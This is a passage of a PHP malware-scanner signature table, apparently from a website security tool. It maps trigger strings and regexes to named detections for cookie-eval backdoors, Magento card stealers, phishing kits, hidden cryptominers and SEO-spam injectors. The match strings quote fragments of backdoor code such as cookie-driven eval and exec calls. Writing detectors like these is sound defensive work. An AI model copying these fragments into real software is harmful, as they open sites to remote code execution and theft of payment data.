			'$domain = $_COOKIE['=> array(STR_TRIGGER,
				'$domain."/wallet/#login");' => array(STR_CLEARFILE, 'php.backdoor.crypto_redirect.001', NULL),
			),
			
			'@header("Location: /");exit;}@setcookie("' => array(STR_CLEARFILE, 'php.phishing.generic.090', NULL),
		),

		'$sitetitle = \'OSFM Static\';' => array(STR_TRIGGER,
			'$pass = \'pass\';' => array(STR_TRIGGER,
				'$user = \'admin\';' => array(STR_CLEARFILE, 'php.backdoor.osfmdefault.001', NULL),
			),
		),

		'(\'\',$_POST,0);' => array(STR_TRIGGER,
			'hostname\'=>$_SERVER[\'HTTP_HOST\'],\'sub\'=>' => array(STR_TRIGGER,
				'time().\'-\'.crc32(uniqid()),time()+' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.104', 'if\(isset\(\$_POST\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[\w]+\(..,\$_POST,0\);[\s]*\$_COOKIE\[.[\w]+.\][\s]*!=[\s]*null\?[^\)]+time\(\)\..-.\.crc32\(uniqid\(\)\),time\(\)\+[^\}]+\}[\s]*function [\w]+\(\$[^\}]+\}[\s]*else[^&]+return implode\(.&.,[\s]*\$[\w]+\);[\s]*\}'),
			),
		),

		'$data=json_encode(array(\'request\'=>$_REQUEST' => array(STR_TRIGGER,
			'$data=base64_encode($data);' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.026', NULL),
		),

		'if (isset($_SERVER[\'HTTP_REFERER\']) and !isset($_COOKIE[' => array(STR_TRIGGER,
			'array(\'google.\', \'yandex.\', \'yahoo' => array(STR_CLEAR_MULTIMATCH, 'php.redirect.header_location.027', '(?:\$\w+\s*=\s*["\'\sbase64_dco.tr_pl]*;\s*)*(\$\w+)\s*=\s*(?:\'http:..[^\?]+\?\d+\'|\$\w+\([^\$;]+?\$\w+\([^;]+?);\s*if\s*\(isset\(\$_SERVER\[.HTTP_REFERER\'\]\)\s*and\s*\!isset\(\$_COOKIE\[.(\w+)[^\{]+\{\s*setcookie\(.\2.,[^;]+;\s*\$\w+\s*=\s*array\(.google..,\s*.yandex...\s*.yahoo[^\{]+\{\s*if\s*\(stripos[^\{]+\{\s*header\(.[Ll]ocation[^\$]+\1\);\s*\}\s*\}\s*\}'),
		),

		'if (isset($_SERVER[\'HTTP_REFERER\']) and !isset($_COOKIE[' => array(STR_TRIGGER,
			'array(\'google.\', \'yandex.\', \'yahoo' => array(STR_CLEAR_MULTIMATCH, 'php.redirect.header_location.027', '(?:\$\w+\s*=\s*["\'\sbase64_dco.tr_pl]*;\s*)*(\$\w+)\s*=\s*(?:\'http:..[^\?]+\?\d+\'|\$\w+\([^\$;]+?\$\w+\([^;]+?);\s*if\s*\(isset\(\$_SERVER\[.HTTP_REFERER\'\]\)\s*and\s*\!isset\(\$_COOKIE\[.(\w+)[^\{]+\{\s*setcookie\(.\2.,[^;]+;\s*\$\w+\s*=\s*array\(.google..,\s*.yandex...\s*.yahoo[^\{]+\{\s*if\s*\(stripos[^\{]+\{\s*header\(.[Ll]ocation[^\$]+\1\);\s*\}\s*\}\s*\}'),
		),

		'setcookie("SESSIID", $rand,time()+3600);' => array(STR_TRIGGER,
			'http_build_query(array(\'utmp\'=>$id,\'utma\'=>$key,\'data\'=>$data' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.031', '\$id=[^;]+;\s*\$url=[^;]+?;\s*if.._COOKIE..SESSIID[^\}]+\}else\{[^\}]+?contents\(\$url, false, \$context\);\s*\}'),
		),

		'* @subpackage Administration' => array(STR_TRIGGER,
			'isset($_COOKIE["wpt"]' => array(STR_CLEAR_LINEMATCH, 'php.malware.wp_admin_cookie.001', 'if\(.isset.._COOKIE."wpt".\)\)\{setcookie."wpt","\w+",time..\+[^,\)]+?,"\/"\);\}'),
		),

		'array(\'\n\', \'^\')' => array(STR_TRIGGER,
			'(isset($_COOKIE[' => array(STR_CLEARFILE, 'php.spam-seo.redirect.070', NULL),
		),

		'checkauthrule();' => array(STR_TRIGGER,
			'$client = new KClickClient(\'http:' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.083', 'class KClickClient[^#]+function checkauthrule\(\)[\s]*\{[\s]*if[\s]*\(isset\(\$_COOKIE\[.[\w]+.\]\)\)[\s]*return false;[\s]*setcookie[^}]+[}\s]+checkauthrule\(\);'),
		),

		'setcookie("nicook", $myserver' => array(STR_CLEAR_MULTIMATCH, 'php.malware.nicook.001', 'if.isset.._GET..\w+..\)\)\s*\{\s*header..Content-Type:[^\}\?]+eval\/\*\*\/\(.\?>[^\}]+\}\s*\$nicook=\s*isset.._COOKIE..nicook[^\;]+;\s*\$myuseragent[^\{]+\{\s*setcookie..nicook., .myserver,[^\}]+exit.1.;\s*\}'),
		'$content =  remove_tags(_dl($_COOKIE[' => array(STR_CLEARFILE, 'php.backdoor.eval_COOKIE.013', NULL),
		'echo $fn(base64_decode($_COOKIE[$' => array(STR_CLEARFILE, 'php.backdoor.eval_COOKIE.022', NULL),
		'(preg_match("/(".$white_engine_search.")/i"' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.122', 'if[\s]*\(isset\(\$_SERVER\[.HTTP_REFERER.\]\)[\s]*&& !isset\(\$_COOKIE[^\}]+[\}\s]+setcookie\([^\}]+[\}\s]+else[^>]+header[\s]*\([\s]*base64_decode\([^;]+\);[^\?]+\}'),
	),

	'@$_COOKIE' => array(STR_TRIGGER,

		'md5(@$_COOKIE' => array(STR_TRIGGER,

			'@$_REQUEST[' => array(STR_TRIGGER,
				'@$_(stripslashes' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.request.006', 'if\(md5\(@\$_COOKIE\[[\w]+\]\)==.[\w]+.\)\s*\(\$_=@\$_REQUEST\[[\w]\]\)\.@\$_\(stripslashes\(\$_REQUEST\[[\w]+\]\)\);'),
			),

			'==8&&in_array(gettype(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.cookie.006', 'if\(\(md5\(@\$_COOKIE\[[\w]+\]\)==.[\w]+.\)\)\{\$[\w]=\$_COOKIE;[^}]+&&\$[\w]\(\)\):\$[\w];\}[\s]*if[\s]*\(isset\(\$_COOKIE\[.[\w]+.\]\)\)\{die\(md5\(.[\w]+.\)\);\}'),
		),

		'=@$_COOKIE;' => array(STR_TRIGGER,
			';if($' => array(STR_TRIGGER,
				'=0;' => array(STR_TRIGGER,
					'^$' => array(STR_TRIGGER,
						'##' => array(STR_TRIGGER,
							'>>' => array(STR_TRIGGER,
								'<<' => array(STR_TRIGGER,
									'\'^\'' => array(STR_CLEARFILE, 'php.malware.obfuscated.011', NULL),
								),
							),
						),
					),
				),
			),
		),

		'__construct()' => array(STR_TRIGGER,
			'header("HTTP/1.0 404 Not Found");' => array(STR_TRIGGER,
				'(@$_COOKIE[' => array(STR_CLEARFILE,'php.backdoor.eval_COOKIE.002', NULL),
			),
		),

		'if(@$_COOKIE["' => array(STR_TRIGGER,
			'{error_reporting(0);@array_map' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.007', 'if..._COOKIE[^{]+\\{error_reporting.0.;@array_map[^}]+;}'),
		),

		'@$_COOKIE[ssid]' => array(STR_TRIGGER,
			'*/ $b=\'sert\'; $a=$a.$b;' => array(STR_CLEARFILE, 'php.backdoor.assert.009', NULL),
		),

		'<?php @$_COOKIE' => array(STR_TRIGGER,
			'@\$_COOKIE\[[^]]+\]\(\$_COOKIE\[[^]]+\]\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.014', '@\$_COOKIE\[[^]]+\]\(\$_COOKIE\[[^]]+\]\);'),
		),

		'](@$_COOKIE[' => array(STR_TRIGGER,
			'if(@$_COOKIE[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.cookie.001.02', 'if\(\@\$_COOKIE\[(.\w+.)\]\)\{(\$\w+)=\$_COOKIE\[\1\]\(..,@\$_COOKIE\[.\w+.\]\(@\$_COOKIE\[.\w+.\]\)\);\2\(\);\}'), 
		),

		'@$_COOKIE["user"]($_COOKIE["id"]);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.COOKIE_eval.004', 'if\s*\(\s*isset\(\$_COOKIE..id.... \@\$_COOKIE..user...._COOKIE..id...;'),
		'@$_COOKIE[set]($_COOKIE[test]);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.COOKIE_eval.005', 'if\s*\(\s*\@?isset\(\$_COOKIE\[test\].. \@\$_COOKIE.set..._COOKIE.test..;'),
		'@register_tick_function(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.COOKIE_eval.006', 'declare\(ticks[\s]*=[\s]*[\d]+[\s]*\)[\s]*;[\s]*@register_tick_function\([\s]*@\$_COOKIE[^;]+;'),
		'$wp_locale = @$_COOKIE' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_COOKIE.024', '\$wp_locale = @\$_COOKIE\[[^\]]+\];[\s]*if[\s]*\([\s]*![\s]*empty\([\s]*\$wp_locale[^@]+@\$wp_locale\([^;]+;'),
	),

	'eval' => array(STR_TRIGGER,

		'base64_decode' => array(STR_TRIGGER,

			'chr(ord($' => array(STR_TRIGGER,
				'}=@unserialize(sh_decrypt(@base64_decode(${$' => array(STR_CLEARFILE, 'php.backdoor.encrypted.003', NULL),
				'])%256)];$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.encrypted.002', '<\?php\s*\$\w+="[^\"]{100,}\";\s*if.isset.._COOKIE[^\)]+\)\)if.md5.._COOKIE[^\?\.]+%256\)\];\$\w+\.=chr\(ord\(\$\w+.\$\w+..\^\$\w+\);\}eval\(\$\w+.;\}\s*\?>'),
			),

			'@unlink(' => array(STR_TRIGGER,
				'echo eval(base64_decode(str_replace(' => array(STR_CLEARFILE, 'php.backdoor.filesman.057', NULL),
			),

			'$outbuf="";$outstr="";exec(base64_decode($_COOKIE[' => array(STR_CLEARFILE, 'php.backdoor.eval_COOKIE.008', NULL),
			'eval(str_rot13(base64_decode($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.044', 'if\s*\(\s*isset\(\$_REQUEST\[.(\w+).\]\s*\)\)\s*(\$\w+)?\s*=\s*\$_REQUEST\[.\1.\]\s*;\s*elseif\s*\(\s*isset\(\$_COOKIE\[.\1.\]\)\)\s*\2\s*=\s*\$_COOKIE\[.\1.\]\s*;\s*if\s*\(\s*isset\(\2\)\)\s*{\s*eval\(\s*str_rot13\(base64_decode\(\2\)\)\)\s*;\s*die\(\)\s*;\s*}'),
			'if(!$_COOKIE["sid"]){die();}' => array(STR_CLEARFILE, 'php.malware.win32_trojan.002', NULL),
		),

		'Array(' => array(STR_TRIGGER,

			']:@$_POST[$' => array(STR_TRIGGER,
				'l__' => array(STR_TRIGGER,
					'l__[\d\(]\(_[\w]+\([\d]+\)\)[\s]*\.[\s]*l__[\d\(]\(_[\w]+\([\d]+\)\)' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.108', '((\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\})|(\$GLOBALS))\[[^@]+@\$_POST[^@]+@\$GLOBALS[^@]+@eval[^;]+;[\s]*exit\(\);[\s]*[\}\s]+'),
				),
			),

			'){return @$' => array(STR_TRIGGER,
				']));exit();}}' => array(STR_CLEARFILE, 'php.backdoor.COOKIE_eval.007', NULL),
			),

            '@$_POST[$_' => array(STR_TRIGGER,
                ');if(!empty($_' => array(STR_CLEARFILE, 'php.backdoor.COOKIE_eval.011', NULL),
            ),

			'return @unserialize(screen_submission($data, $key)' => array(STR_CLEARFILE, 'php.backdoor.dgreusdi.001.02', NULL),
		),

		'= get_contents(' => array(STR_TRIGGER,
			'eval(\'?>\'.$' => array(STR_CLEARFILE, 'php.hacktool.downloader.007', NULL),
		),
	),

	'base64_decode' => array(STR_TRIGGER,

		'_COOKIE;' => array(STR_TRIGGER,
			'var_dump' => array(STR_TRIGGER,
				'array_pop' => array(STR_TRIGGER,
					'\$[\w]+[\s]*=[\s]*array_pop\([\s]*\$[\w]+[\s]*\);[\s]*var_dump\([\s]*\$[\w]+\([\s]*\$[\w]+[\s]*,[\s]*\$[\w]+\)[\s]*\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_COOKIE.017', '\$[\w]+[\s]*=[\s]*\$_COOKIE;[\s]*\$[\w]+[\s]*=[\s]*"[\w]+";[\s]*if[\s]*\(isset\(\$[\w]+\[\$[\w]+\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*base64_decode\(\$[\w]+\[\$[\w]+\]\);[\s]*\$[\w]+[\s]*=[\s]*unserialize\(\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*array_pop[^{]+var_dump\(\$[\w]+\(\$[^}]+\}'),
				),
			),
		),

		'array_shift($' => array(STR_TRIGGER,
			'unserialize' => array(STR_TRIGGER,
				'(\$[\w]+)[\s]*=[\s]*"[\w]+";[\s]*foreach[\s]*\([\s]*\$_COOKIE as \$[^\{]+\{[\s]*if[\s]*\([\s]*\$[\w]+ == \1' => array(REX_CLEARFILE, 'php.backdoor.eval_COOKIE.011', NULL),
			),
		),

		'end($' => array(STR_TRIGGER,
			'echo $' => array(STR_TRIGGER,
				'(\$[\w]+)[\s]*=[\s]*\$_COOKIE;[\s]*foreach[\s]*\([\s]*\1 as \$[\w]+ => \$[\w]+[\s]*\)[\s]*\{[\s]*if[\s]*\([\s]*\$[\w]+ == "' => array(REX_CLEARFILE, 'php.backdoor.eval_COOKIE.011.02', NULL),
			),
		),

		'array_pop($' => array(STR_TRIGGER,
			'echo @$' => array(STR_TRIGGER,
				'\$[\w]+ = "[^;]+;[\s]*(\$[\w]+)[\s]*=[\s]*\$_COOKIE;[\s]*foreach[\s]*\([\s]*\1 as \$[\w]+ => \$[\w]+[\s]*\)[\s]*\{[\s]*if' => array(REX_CLEARFILE, 'php.backdoor.eval_COOKIE.011.03', NULL),
			),
		),

		'$redirect_url = trailingslashit( home_url( $wp->request' => array(STR_TRIGGER,
			'$config[\'init\'] = preg_replace(\'/_/\', "", $' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.015', NULL),
		),
	),

	'extract($_COOKIE' => array(STR_TRIGGER,
		
		'*/extract($_COOKIE);/*' => array(STR_CHAIN_TRIGGER,
			'*/extract($_COOKIE);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.004', '\*\/extract\(\$_COOKIE\);\/\*'),
			'&&@$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.004.03', '\*\/@\$[\w]+&&@\$[\w]+\(\$[^;]+\);\/\*'),
		),

		'extract($_COOKIE);@$' => array(STR_TRIGGER,
			'extract($_COOKIE);@$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.016', 'extract\(\$_COOKIE\);@\$\w\(@\$[^;]+\);'),
		),

		'extract($_COOKIE, 1);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.COOKIE_eval.003', 'extract\(\$_COOKIE,\s*1\);\s*\@\$\w+&&(\@)?\$\w+\(.+?\);'), //modified by Luke Leal to cover new variant
		'extract($_COOKIE);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_COOKIE.004.02', 'extract\(\$_COOKIE\)\s*;\s*if\s*\((\$\w+)\s*\)\s*{\s*\@?\1\s*\(\$\w+\(?,?\$\w+[^}]+}'),
	),

	'=$_COOKIE;' => array(STR_TRIGGER,

		'&&in_array(gettype($' => array(STR_TRIGGER,
			'$_COOKIE;(count($' => array(STR_TRIGGER,
				'))?(($' => array(STR_CHAIN_TRIGGER,
					'()):$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.020', '\$[\w]+[\s]*=[\s]*\$_COOKIE;[\s]*\(count\(\$[\w]+\)==[\d]+&&in_array\(gettype[^:\n]+:\$[\w]+;'),
					'echo $_GET[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.020.02', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_GET\[.[\w]+[^\{]+\{[\s]echo \$_GET\[[^\}]+\}[\s]*'),
				),
			),
		),

		']);$' => array(STR_TRIGGER,
			'(\$\w+)\s*=\s*\$_COOKIE;[^\}]+?\w+\(\1\[' =>  array(REX_CLEAR_MULTIMATCH, 'rex.eval_cookie.003', '(\$\w+)\s*=\s*\$_COOKIE;[^\}]+?(\$\w+)=(\$\w+)\(\1\[\w+\]\);(\$\w+)=\3\(\1\[\w+\]\);(\$\w+)=\2[^;]+\4\);\5\(\);\s*\}'),
		),

		'];if(isset($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.cookie.005', '<\?(?:php)?\s*(\$\w+)\s*=\s*\$_COOKIE\s*;\s*(\$\w+)\s*=\s*\1\s*\[.\w+.\]\s*;\s*\1\s*=\s*\1\s*\[.\w+.\]\s*;\s*if\(isset\(\2\)\s*\)\s*\@?\s*\2\(\1\)\s*;\s*\?>'),
	),

	'CURLOPT_RETURNTRANSFER' => array(STR_TRIGGER,
		'function fetch_value($str, $find_start, $find_end)' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.010', NULL),
		'if(in_array(\'administrator\',' => array(STR_CLEARFILE, 'php.hacktool.generic.030', NULL),
		'if(preg_match(\'#/login/device-based/update-nonce/|/login/save-device/|checkpointSubmitButton|MCheckpointController#\',' => array(STR_CLEARFILE, 'html.phishing.facebook.006.02', NULL),
	),

	'if (!function_exists(' => array(STR_TRIGGER,
		'array_map (' => array(STR_TRIGGER,
			'explode(\'|\',$' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.array_filter.003.03', 'if\s*\(\!function_exists\([\'"](\w+)[\'"]\)\)\s*:\s*(?:\/[^\/]+\/\s*)?function\s*\1\s*\((\$\w+)\)\s*{[^\(]+\([\'"]\|[\'"],\s*\2\s*\)\s*;\s*(\$\w+)\s*=\s*\2\[\d+\]\s*;\s*if\s*\(\3[^;]+;\s*}\s*elseif\s*\([^}]+}\s*else\s*{\s*\3\s*=\s*\$\w+\(\3\)\s*;\s*}\s*}\s*return\s*\3\s*;\s*}\s*endif\s*;\s*(?:\n\/\/[\s\w\-\S]+\n)?array_map\s*\([\'"]\1[\'"]\s*,\s*\$_COOKIE\s*\)\s*;'),
		),
	),

	'g__g_' => array(STR_TRIGGER,
		'$_g_g_[6](\'\', $g___g_);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.encrypted.001', '(error_reporting.0.;[\s]*if.._GET[^{]+\{[\s]*)?\$ver = .[^;]+;[\s]*\$check = \$ver\{[^>]+\$g_+g_\(\);[\s]*}[\s]*}'),
	),

	'error_reporting(0);if(isset($_COOKIE[' => array(STR_TRIGGER,
		'function ob_sh($buffer){$buffer = preg_replace("@<!--(.*?)-->@si","",$buffer)' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.006', '<.php \$\w+=1;error_reporting.0.;if.isset.._COOKIE..ping... &&[^<]+?\{function ob_sh..buffer...buffer = preg_replace..\@<[^\}]+\}return .NotGO->[^\?2]+?=2;\?>'),
	),

	'unlink(' => array(STR_TRIGGER,
		'{unlink(__FILE__); die(md5(' => array(STR_CLEAR_LINEMATCH, 'php.malware.COOKIE_check.002', 'if\s*\(\s*isset\s*\(\s*\$_COOKIE\[[\'"]\w+[\'"]\]\s*\)\s*and\s*md5\s*\(\s*\$_COOKIE\[[\'"]\w+[\'"]\]\s*\)\s*=+[\'"]\w+[\'"]\s*\)\s*{\s*unlink\s*\(__FILE__\)\s*;\s*die\(md5\(\s*\w+\s*\)\s*\)\s*;\s*}'),
	),

	'function system_start()' => array(STR_TRIGGER,
		'"openvd")' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.uploader.295', 'function[\s]*system_start\(\)\{[\s]*error_reporting\(0\);[\s]*\$[\w][\s]*=[\s]*preg_replace\(.\/\[A-Z\]\/.,..,.bPaNMse64F_dTeGcoFde.\);[^\{]+\]==[\s]*.openvd.\)\{[^\}]+exit;[\s]*\}[\s]*}system_start\(\);'),
	),

	'$redirect_to = user_admin_url();' => array(STR_TRIGGER,
		'(!empty($_COOKIE[\'wordpress_test_cookies\'])' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_users.011', 'if \(!empty\(\$_COOKIE\[.wordpress_test_cookie[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*\$_REQUEST\[.action.\];[^\}]+exit\(\);[\s\}]+'),
	),

	'$_COOKIE[\'currentcvv' => array(STR_TRIGGER,
		'(openssl_public_encrypt($data, $encrypted, $this->pubkey)' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.124', NULL),
	),

	'(); } else { if (!$_COOKIE[' => array(STR_TRIGGER,
		'])) % 256); } $' => array(STR_CLEARFILE, 'php.backdoor.generic.089', NULL),
	),

	'private function hasUnconfirmedBackdoors()' => array(STR_CLEARFILE, 'php.backdoor.backdoor_installer.009', NULL),
	'if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]==\'/google' => array(STR_CLEAR_MULTIMATCH,'php.hacktool.googler.002', 'if.empty.\\$_COOKIE. && \\$_SERVER..REQUEST_URI\"\\]==..google[^{]+.html.\\)\\{[\\s]*echo .google-site-verification: google[^;]+.html.;[\\s]*exit;[\\s]*}'),
	'){print $c[\'body\'];}}}function request($url){if' => array(STR_CLEARFILE, 'php.spam-seo.injector.322', NULL),
	'isset\(\$_COOKIE\[\'\w+\'\]\)&&\(\$\w+=\$_COOKIE\[\'\w+\'\]\)&&file_exists\(\$\w+\)&&require_once\(\$\w+\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.cookie.012', 'isset\(\$_COOKIE\[\'\w+\'\]\)&&\(\$\w+=\$_COOKIE\[\'\w+\'\]\)&&file_exists\(\$\w+\)&&require_once\(\$\w+\);'),
),

'echo' => array(STR_TRIGGER,

	'(function_exists(\'curl_init\'))' => array(STR_TRIGGER,

		'/jquery-' => array(STR_TRIGGER,
			'echo "$data";' => array(STR_CLEAR_MULTIMATCH, 'php.injected.fake_wp_jquery.003', 'if\s*\(function_exists\(\'curl_init\'\)\)\s*\{\s*\$url[^;]+?jquery-[^\{\}]+echo \"\$data\";\s*\}'),
			'}add_action(' => array(STR_CLEAR_LINEMATCH, 'php.injected.fake_wp_jquery.002', 'if[\s]*\(!function_exists\(.([\w]+).\)\)\{function [\w]+\(\)\{[\s]*if \(function_exists\(.curl_init.\)\)[\s]*\{[\s]*\$url[\s]*=[\s]*[^;]+jquery[^;]+;[^}]+\}}[\s]*add_action\([^,]+,[\s]*.\1.\);}'),
		),

		'file_put_contents($' => array(STR_TRIGGER,
			'if(isset($_REQUEST[' => array(STR_TRIGGER,
				'echo $' => array(STR_TRIGGER,
					'file_get_contents($' => array(STR_CLEARFILE, 'php.backdoor.curl.027', NULL),
				),
			),
		),

		'$webz=$_POST[' => array(STR_TRIGGER,
			'$uri_in=$_POST' => array(STR_CLEARFILE, 'php.hacktool.check_requirements.003', NULL),
		),

		'$url="$a:$b/$c/$test";' => array(STR_CLEAR_LINEMATCH, 'php.injected.fake_wp_jquery.004', '\$\w=.http:[^\']+\';\$\w=.\d+.;\$\w=.\w+.;function curl_post\([^\}]+\}if.function_exists..curl_init[^\}]+?\$url="\$a:\$b\/\$c\/\$test[^\}]+?\}'),
	),

	'style' => array(STR_TRIGGER,

		'div class="minero-hidden"' => array(STR_TRIGGER,
			'echo \'<div class="minero-hidden" style="display' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cryptominer.008', 'function\s*\w+\(\)\s*{\s*wp_enqueue_script\([^:]+:\/\/minero\.\w+\/lib\/minero-hidden\.min\.js.,\s*array\(\)\s*\)\s*;\s*echo\s*.<div\s*class\s*=\s*.minero-hidden.\s*style\s*=\s*.display\s*:\s*none[^;]+;\s*}\s*add_action\(.wp_footer.,[^;]+;'),
			'<script src="https://minero.cc/lib/minero-hidden' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cryptominer.008.02', '<script src=.https:..minero.cc.lib.minero-hidden[^>]+><.script>[\s]*<div class[\s]*=[\s]*.minero-hidden[^>]+><.div>'),
		),

		'<form name="validation" method="POST" action="' => array(STR_TRIGGER,
			'>Sign in your Email<' => array(STR_CLEARFILE, 'php.phishing.generic.055', NULL),
		),

		'height:0' => array(STR_TRIGGER,
			'echo (is_front_page()) ? \'' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.272', 'echo\s*\(is_front_page\(\)\s*\)\s*\?\s*\'\s*<a\shref\s*=[^\']+\'\s*:\s*\'\s*\''),
		),

		'if ( is_front_page() ) { echo \' <p hidden>' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.link_injector.008', 'if\s*\(\s*is_front_page\(\)\s*\)\s*{\s*echo\s*[\'"]\s*<p\s*hidden\>\s*[^>]+>\s*<a\s*id\s*=\s*[\'"]\w+[\'"]\s*href=\s*[\'"]http(s)?:[^"]+"\s*style=[\'"]display:none[\'"]\>[^>]+>[\'"];\s*}'),
	),

	'=\'http' => array(STR_TRIGGER,
		
		'$url' => array(STR_TRIGGER,
			'echo $file_contents;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.204', '\$url[\s]*=[\s]*.http[^;]+;[\s]*[^;]+\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*\$timeout[\s]*=[\s]*5;[^>]+curl_close\(\$[\w]+\);[\s]*echo \$[\w]+;'),
			'value=\'G_Bl0k Security Team' => array(STR_CLEARFILE, 'php.backdoor.uploader.130', NULL),
			'return "<div><b>PageRank' => array(STR_CLEARFILE, 'php.hacktool.page_rank_checker.001', NULL),
		),

		'if(!is_null($_GET[\'pageIndex\']))' => array(STR_TRIGGER,
			'file_get_contents($' => array(STR_TRIGGER,
				'if(!is_null($_GET[\'p_id\']))' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.173', '<\\?php[\\s]*(error_reporting[^;]+;[\\s]*)?\\$url[^;]*;[\\s]*if.!is_null\\(\\$_GET..pageIndex..\\)\\)[\\s]*\\$url[^>]+if..is_null.._GET..p_id.\\]\\)\\)[^>]+echo[^;]+;[\\s]*\\?>'),
			),
		),
	),

	'function getStr(' => array(STR_TRIGGER,
		'$start' => array(STR_TRIGGER,
			'explode($end' => array(STR_TRIGGER,
				'aypal' => array(STR_CLEARFILE, 'php.phishing.checker.001', NULL),
				'error_reporting(0);' => array(STR_CLEARFILE, 'php.phishing.checker.002', NULL),
			),
		),
	),

	'0O0' => array(STR_TRIGGER,

		',CURLOPT_TIMEOUT,100);' => array(STR_TRIGGER,
			'foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.15', '(\$[\w]{3,40}[\s]*=[^;]+;[\s]*){10,}[^\n]+\]\(\);[\s]*(\/\*[^\*]+\*\/[\s]*)?'),
		),

		'] as $header){header($header);}echo $' => array(STR_TRIGGER,
			'\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.17', '\$[\w]+[\s]*=[\s]*array\(..[\w]+..=>\$[\w]+\[..x[\d]+[^\{]+\$[\w]+=\$\{[^;]+\]\);\$[\w]+=\$\{[^{]+\{foreach\(\$[\w]+\[.[\w]+.\][\s]*as[\s]*\$[\w]+\)\{header\(\$[\w]+\);\}echo[\s]*\$[\w]+\[.[\w]+.\];die\(\);\}.\);\$\{[^;]+\]\(\$[\w]+\);'),
		),
	),

	'HTTP-EQUIV=\'refresh' => array(STR_TRIGGER,
		'}else if(preg_match(\'/hotmail' => array(STR_CLEARFILE, 'php.phishing.redirect.043', NULL),
		'if (!isset($_GET[\'view\']) && !isset($_GET[' => array(STR_CLEARFILE, 'php.phishing.redirect.044', NULL),
	),

	')){echo ${' => array(STR_TRIGGER,
		'index.htm' => array(STR_TRIGGER,
			'if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}' => array(STR_CLEAR_MULTIMATCH, 'php.malware.GLOBALS.006', 'if\(\$\{[\'"].x47.x4c.x4f.x42[^\}]+\}\[.[^\(]+\(.index.[htmls]{4,}.\)\)\{echo\s*\$\{[^\(]+\(.index.[htmls]{4,}.\);\}if\(\$\{[^\{]+\{echo\s*\$\{[^\{]+\{[^\$]+\$\{[^\(]+\(.index.[htmls]{4,}\'\);\}'),
		),
	),

	'echo "ok!";' => array(STR_TRIGGER, 
		'$strDefault = file_get_conten' => array(STR_TRIGGER, 
			'",$strDefault);' => array(STR_CLEARFILE,'php.backdoor.injector.106', NULL), 
		),
	),

	'echo $content;' => array(STR_TRIGGER,
		'$content .= $line;' => array(STR_TRIGGER,
			'txt\', \'r\'))' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.314', 'if[\s]*\(\$[\w]+[\s]*=[\s]*fopen\([^\)]+txt.,[^\{]+\{[\s]*\$content[\s]*=[\s]*..;[\s]*(\/\/[^\n]+[\s]*)?while \(\$line[\s]*=[\s]*fread\(\$[^\}]+[\}\s]+echo \$content;'),
		),
	),

	'echo $htmls;' => array(STR_TRIGGER,
		'$htmls =  str_replace("</script></body></html>","</script><script src=\"http:' => array(STR_CLEARFILE,'php.spam-seo.injector.133', NULL), //echo | str_
	),

	'all is ok' => array(STR_TRIGGER,
		'if(isset($_GET["rdir"]) && trim($_GET["rdir"])){' => array(STR_CLEARFILE, 'php.backdoor.generic.046', NULL),
	),

	'echo php_uname()' => array(STR_TRIGGER,
		'=@ini_get(\'disable_functions\'))){echo "<font color=green>NONE</font></b>";}else{echo' => array(STR_CLEARFILE, 'php.hacktool.ini_settings.001', NULL),
	),

